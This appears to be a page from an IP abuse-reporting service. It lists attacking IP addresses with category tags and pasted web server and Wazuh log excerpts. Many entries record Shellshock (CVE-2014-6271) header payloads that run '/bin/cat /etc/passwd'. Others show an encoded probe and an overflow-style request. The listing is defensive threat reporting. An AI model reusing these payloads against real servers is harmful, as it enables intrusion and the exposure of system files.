|
πΈπ¬
178.128.212.209
|
|
[20/Jan/2025:05:28:54 -0300] "GET / HTTP/1.0" 200 3926 "() { ignored; }; echo Content-Type: text/htm ...
show more
[20/Jan/2025:05:28:54 -0300] "GET / HTTP/1.0" 200 3926 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
show less
|
DDoS Attack
Email Spam
Port Scan
|
|
ππ°
89.185.25.148
|
|
Exploitation for Privilege Escalation, Exploit Public-Facing Application
|
Port Scan
Hacking
Brute-Force
Web App Attack
SSH
|
|
ππ°
89.185.25.149
|
|
Exploitation for Privilege Escalation, Exploit Public-Facing Application
|
Port Scan
Brute-Force
Web App Attack
SSH
|
|
π―π΅
156.231.11.144
|
|
Exploitation for Privilege Escalation, Exploit Public-Facing Application
|
Port Scan
Hacking
Brute-Force
Web App Attack
SSH
|
|
πΊπΈ
38.6.191.13
|
|
Exploitation for Privilege Escalation, Exploit Public-Facing Application
|
DDoS Attack
Port Scan
Hacking
Brute-Force
Web App Attack
SSH
|
|
πΊπΈ
23.224.55.231
|
|
Exploitation for Privilege Escalation, Exploit Public-Facing Application
|
DDoS Attack
Port Scan
Brute-Force
Web App Attack
SSH
|
|
πΊπΈ
138.197.23.5
|
|
Exploitation for Privilege Escalation, Exploit Public-Facing Application
|
DDoS Attack
Port Scan
Brute-Force
Web App Attack
SSH
|
|
πΈπ¬
51.79.205.147
|
|
Exploitation for Privilege Escalation, Exploit Public-Facing Application
|
Port Scan
Exploited Host
Web App Attack
|
|
ππ°
180.188.198.135
|
|
HTTP Method: POST
|
Hacking
SQL Injection
Exploited Host
|
|
ππ°
206.238.196.225
|
|
206.238.196.225 - - [21/Nov/2024:09:02:19 +0000] "GET /cgi-bin/slogin/login.py HTTP/1.1" 301 178 "-" ...
show more
206.238.196.225 - - [21/Nov/2024:09:02:19 +0000] "GET /cgi-bin/slogin/login.py HTTP/1.1" 301 178 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"
show less
|
DDoS Attack
Brute-Force
Web App Attack
SSH
|
|
πΊπΈ
34.234.197.175
|
|
34.234.197.175- - [21/Nov/2024:09:02:19 +0000] "GET /cgi-bin/slogin/login.py HTTP/1.1" 301 178 "-" " ...
show more
34.234.197.175- - [21/Nov/2024:09:02:19 +0000] "GET /cgi-bin/slogin/login.py HTTP/1.1" 301 178 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"
show less
|
DDoS Attack
Brute-Force
Web App Attack
SSH
|
|
π§π·
169.150.198.88
|
|
169.150.198.88 - - [17/Nov/2024:20:09:39 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 1577 "() { igno ...
show more
169.150.198.88 - - [17/Nov/2024:20:09:39 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 1577 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
show less
|
DDoS Attack
|
|
πΊπΈ
104.28.237.246
|
|
169.150.198.88 - - [17/Nov/2024:20:09:39 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 1577 "() { igno ...
show more
169.150.198.88 - - [17/Nov/2024:20:09:39 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 1577 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
show less
|
DDoS Attack
|
|
ππ°
154.201.69.250
|
|
154.201.69.250 - - [10/Nov/2024:10:56:41 +0000] "GET /cgi-bin/status/status.cgi HTTP/1.1" 301 605 "( ...
show more
154.201.69.250 - - [10/Nov/2024:10:56:41 +0000] "GET /cgi-bin/status/status.cgi HTTP/1.1" 301 605 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
show less
|
Brute-Force
Web App Attack
SSH
|
|
ππ°
156.238.230.115
|
|
rule.description:Shellshock attack detected rule.groups:web, accesslog, attack rule.mitre.technique: ...
show more
rule.description:Shellshock attack detected rule.groups:web, accesslog, attack rule.mitre.technique:Exploitation for Privilege Escalation, Exploit Public-Facing Application rule.mitre.id:T1068, T1190 rule.mitre.tactic:Privilege Escalation, Initial Access rule.id:31168 rule.nist_800_53:SI.4 rule.info:CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 rule.gdpr:IV_35.7.d location:/var/log/nginx/access.log decoder.name:web-accesslog id:1731119647.51148708 GeoLocation.country_name:United States GeoLocation.location:{ "lon": -97.822, "lat": 37.751 } full_log:156.238.230.115 - - [09/Nov/2024:02:34:07 +0000] "GET / HTTP/1.1" 200 324 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" timestamp:Nov 8, 2024 @ 23:34:07.699 _index:wazuh-alerts-4.x-2024.11.09
show less
|
Port Scan
Brute-Force
Web App Attack
|
|
πΊπΈ
149.115.241.167
|
|
Exploitation for Privilege Escalation, Exploit Public-Facing Application rule.mitre.id:T1068, T1190 ...
show more
Exploitation for Privilege Escalation, Exploit Public-Facing Application rule.mitre.id:T1068, T1190 rule.mitre.tactic:Privilege Escalation, Initial Access rule.id:31168 rule.nist_800_53:SI.4 rule.info:CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 rule.gdpr:IV_35.7.d location:/var/log/httpd/access_log decoder.name:web-accesslog id:1731168323.201348404 GeoLocation.city_name:Los Angeles GeoLocation.country_name:United States GeoLocation.region_name:California GeoLocation.location:{ "lon": -118.244, "lat": 34.0544 } full_log:149.115.241.167 - - [09/Nov/2024:13:05:21 -0300] "GET / HTTP/1.1" 200 190 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_7_3; es) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.7 Safari/605.1.15" timestamp:Nov 9, 2024 @ 13:05:23.162 _index:wazuh-alerts-4.x-2024.11.09
show less
|
Port Scan
Web App Attack
SSH
|
|
πΊπΈ
65.49.20.10
|
|
Oct 30 17:02:56 php sshd[3188557]: Invalid user from 65.49.20.102 port 47247
|
Brute-Force
SSH
|
|
π΅π
128.1.57.69
|
|
128.1.57.69 - - [30/Oct/2024:04:59:04 +0000] "GET / HTTP/1.1" 200 689 "() { ignored; }; echo Content ...
show more
128.1.57.69 - - [30/Oct/2024:04:59:04 +0000] "GET / HTTP/1.1" 200 689 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
show less
|
DDoS Attack
Port Scan
Hacking
Brute-Force
Web App Attack
|
|
π¨π
148.187.148.136
|
|
148.187.148.136 - - [30/Oct/2024:06:19:55 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 302 422 "() { igno ...
show more
148.187.148.136 - - [30/Oct/2024:06:19:55 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 302 422 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.51"
show less
|
FTP Brute-Force
Hacking
Web App Attack
|
|
ππ°
103.85.25.166
|
|
103.85.25.166 - - [25/Oct/2024:11:59:22 +0000] "GET / HTTP/1.1" 301 248 "() { ignored; }; echo Conte ...
show more
103.85.25.166 - - [25/Oct/2024:11:59:22 +0000] "GET / HTTP/1.1" 301 248 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.4.20"
show less
|
Port Scan
Web App Attack
SSH
|
|
π§π·
45.128.128.248
|
|
5.128.128.248 - - [23/Oct/2024:14:27:54 +0000] "GET / HTTP/1.1" 200 689 "() { Referer; }; echo -e \x ...
show more
5.128.128.248 - - [23/Oct/2024:14:27:54 +0000] "GET / HTTP/1.1" 200 689 "() { Referer; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo -e \x22\x5C0141\x5C0141\x5C0141\x5C0141\x5C0141\x5C0141\x5C0141\x5C0141\x5C0163\x5C0150\x5C0145\x5C0154\x5C0154\x5C0163\x5C0150\x5C0157\x5C0143\x5C0153\x22" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
show less
|
Port Scan
Web App Attack
|
|
π²πΎ
111.90.159.213
|
|
111.90.159.213 - - [24/Oct/2024:08:43:34 +0000] "GET /cgi-bin/slogin/login.py HTTP/1.1" 301 178 "-" ...
show more
111.90.159.213 - - [24/Oct/2024:08:43:34 +0000] "GET /cgi-bin/slogin/login.py HTTP/1.1" 301 178 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"
show less
|
Brute-Force
Web App Attack
|
|
π―π΅
49.212.203.250
|
|
49.212.203.250 - - [15/Oct/2024:17:43:04 -0300] "GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
show more
49.212.203.250 - - [15/Oct/2024:17:43:04 -0300] "GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
show less
|
DDoS Attack
|
|
ππ°
156.224.25.144
|
|
156.224.25.144 - - [27/Sep/2024:09:18:06 +0000] "GET /cgi-bin/slogin/login.py HTTP/1.1" 301 178 "-" ...
show more
156.224.25.144 - - [27/Sep/2024:09:18:06 +0000] "GET /cgi-bin/slogin/login.py HTTP/1.1" 301 178 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"
show less
|
Port Scan
Brute-Force
SSH
|
|
π³π±
94.156.64.12
|
|
94.156.64.12 - - [16/Sep/2024:16:44:06 +0000] "GET / HTTP/1.1" 200 4388 "() { ignored; }; echo Conte ...
show more
94.156.64.12 - - [16/Sep/2024:16:44:06 +0000] "GET / HTTP/1.1" 200 4388 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36"
show less
|
Port Scan
Hacking
Brute-Force
SSH
|